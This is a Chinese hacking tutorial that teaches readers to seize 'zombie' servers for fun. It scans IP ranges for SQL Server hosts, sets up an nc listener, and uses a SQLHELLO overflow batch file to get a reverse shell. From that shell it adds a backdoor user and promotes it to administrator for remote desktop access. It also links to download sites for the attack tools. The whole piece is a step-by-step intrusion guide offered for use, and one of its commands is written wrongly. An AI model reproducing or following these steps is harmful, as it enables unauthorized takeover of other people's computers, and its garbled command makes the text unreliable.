一个月黑风高的夜晚，笔者端庄文雅地坐在电脑旁前，看着屏幕闪烁出的入侵信息，时不时地嘴角露出微笑，又成功地抓取了一只“肉鸡”。

小知识：什么叫“肉鸡”

肉鸡是指在网络上，已经被你成功入侵的主机，并且这台机器完全受控于入侵者的任意操作，如同本机操控一样的直观顺手。但是对于网络“肉鸡”的抓取，大家可以利用IPC$特殊共享的漏洞，来远程建立空连接，并使用上传、运行的命令，激活该木马的服务端，即可使此机“摇身”变为肉鸡。

下面笔者为感兴趣的朋友演示一下如何获得“肉鸡”，本次入侵进入的主机是装有SQL数据库程序的服务器。如果读者想按笔者的方法去体验抓鸡乐趣，首先需找寻一台装有该程序的数据库。找寻方法：随意挑选一款扫描端口软件，将扫描的1433、3389端口勾选上。然后在开始扫描所设立的IP段。不一会，提示信息中所出现的IP，就是装有SQL程序的主机。

● 天罗地网——监听本机端口信息

提到网络监听，相信读者朋友，自然会想到知名的瑞士军刀——NC工具（下载地址：http://x8x.com.ru/web/QqD/downC/025654705.htm），此款软件以短小精悍著称，深受广大黑迷朋友们的青睐。为了便于今天的讲解，笔者也已将其收录到本地驱动器I盘符中。

第一步：运行NC工具，单击“开始”菜单，选择“运行”标签，会出现“运行”对话框。在“打开”标签处输入CMD命令，然后敲击“回车”键。在弹出的命令窗体中，将目录跳转到NC软件所在的位置。

第二步：在命令行处输入“NC-vv-l-p 1987 ” 的命令，然后敲击“回车”键，即可实现对本机1987端口的监听（图1）。

小提示：NC软件里的-vv参数代表，得到更详细的输入监听内容。-l代表连接端口关闭后，仍然继续监听。-p进行监听本地端口，后跟数字就是所要监听的端口号。

● 赶兔撞树——溢出攻击

“天罗地网”已经布置妥当，就等肉鸡来访。不过守株待兔自然不是聪明之举，所以需要我们牵引着小白兔来撞树。这里笔者编写了一个批处理文件，将SQLHELLO的溢出命令放置在其中，然后配合该工具的使用，实现溢出攻击，让肉鸡自投罗网。具体方法如下：

第一步：将监听本机的命令窗体，呈最小化模式，回到Windows图形界面操作。然后在硬盘驱动器中，找到事先所准备的SQLHELLO溢出程序（下载地址：http://www.sun-lion.com/down/data/soft/627.html），将其解压到程序所在的目录。

第二步：右击解压出来的1.BAT文件，选择“编辑”选项，在弹出的记事文本内容处，输入命令SQLHELLO 溢出IP地址 1433端口本机IP 监听端口（图2）。操作完毕后，单击“文件”菜单，选择“保存”选项，然后再将此窗口关闭即可。

小提示：解压出来的1.BAT文件，是用来执行SQLHELLO程序溢出的，所以大家可以按着上述批处理文件中的内容，照猫画虎地替换想要溢出、反向连接的IP。

第三步：双击刚才关闭的1.BAT文件，屏幕顿时闪过执行命令的窗体，可见批处理文件，指挥SQLHELLO溢出程序已经开始运行。这时切换到NC命令监听窗体，你会发现已经获取了对方的SHELL（图3），接下来在此远程SHELL平台中，敲入NET USER WENPENG 123456 /ADD的命令，将其“WENPENG”用户名添加到远程主机中。

第四步：然后使用NET USER Administrators WENPENG /ADD的命令，将其WENPENG这位用户提升为远程管理员，最后使用本机自带的远程终端软件，敲入刚才所提升、建立的用户进入，即可远程观看到肉鸡桌面（图4）。

小提示：当入侵者拿到远程主机的管理员权限，便可以随意远程操控该机器。在肉鸡中得到SHELL是操作系统的最外层，管理着你与操作系统交互、通讯、执行等工作的操作，假设你已经得到了对方的SHELL，也就代表着你拥有了与对方计算机直接沟通、下达命令的权力。

获取肉鸡就这么简单。当然，在实际操作时，还会碰到不同的情况与问题，要战胜它们就需要知识与经验的积累了。